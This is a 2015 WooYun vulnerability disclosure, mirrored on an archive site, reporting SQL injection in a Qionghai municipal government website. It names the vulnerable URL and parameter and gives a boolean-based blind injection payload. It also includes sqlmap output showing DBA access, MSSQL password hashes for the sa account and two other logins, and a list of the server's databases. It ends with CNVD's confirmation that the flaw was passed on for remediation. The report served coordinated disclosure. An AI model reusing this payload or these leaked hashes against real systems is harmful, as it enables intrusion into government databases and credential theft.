乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-26: 细节已通知厂商并且等待厂商处理中 2015-01-29: 厂商已经确认,细节仅向厂商公开 2015-02-08: 细节向核心白帽子及相关领域专家公开 2015-02-18: 细节向普通白帽子公开 2015-02-28: 细节向实习白帽子公开 2015-03-12: 细节向公众公开
琼海市某政府站点sql注射漏洞
1#注射点
http://www.qhxz.gov.cn/index/SpecialServ/ServList/ServShow/?id=46900200FG-SP-0002
2#注射信息
sqlmap identified the following injection points with a total of 174 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=46900200FG-SP-0002' AND 6637=6637 AND 'aiHB'='aiHB---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=46900200FG-SP-0002' AND 6637=6637 AND 'aiHB'='aiHB---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft SQL Server 2008current user is DBA: Truesqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=46900200FG-SP-0002' AND 6637=6637 AND 'aiHB'='aiHB---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft SQL Server 2008current user is DBA: Truedatabase management system users password hashes:[*] ##MS_PolicyEventProcessingLogin## [1]: password hash: 0x01008bd8f5121172ffb6dd50023fde626301b435c2941d753d4f header: 0x0100 salt: 8bd8f512 mixedcase: 1172ffb6dd50023fde626301b435c2941d753d4f[*] ##MS_PolicyTsqlExecutionLogin## [1]: password hash: 0x01005a377e7daebb6c679dae6246647e5d9825dd2611ff81c2f4 header: 0x0100 salt: 5a377e7d mixedcase: aebb6c679dae6246647e5d9825dd2611ff81c2f4[*] sa [1]: password hash: 0x0100dc6730943d7a4ddc0c0c11a3306d3a479619f19f1e9f80b7 header: 0x0100 salt: dc673094 mixedcase: 3d7a4ddc0c0c11a3306d3a479619f19f1e9f80b7available databases [15]:[*] ceshi[*] hn_qh_dzjc[*] hn_qh_jh[*] hn_qh_kq[*] hn_qh_qzk[*] hn_qh_sxsl[*] hn_qh_web[*] hn_qh_xzsp[*] hn_qh_zwgk[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
3#注射图片
过滤
危害等级:中
漏洞Rank:10
确认时间:2015-01-29 11:23
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给海南分中心,由海南分中心后续协调网站管理单位处置。
暂无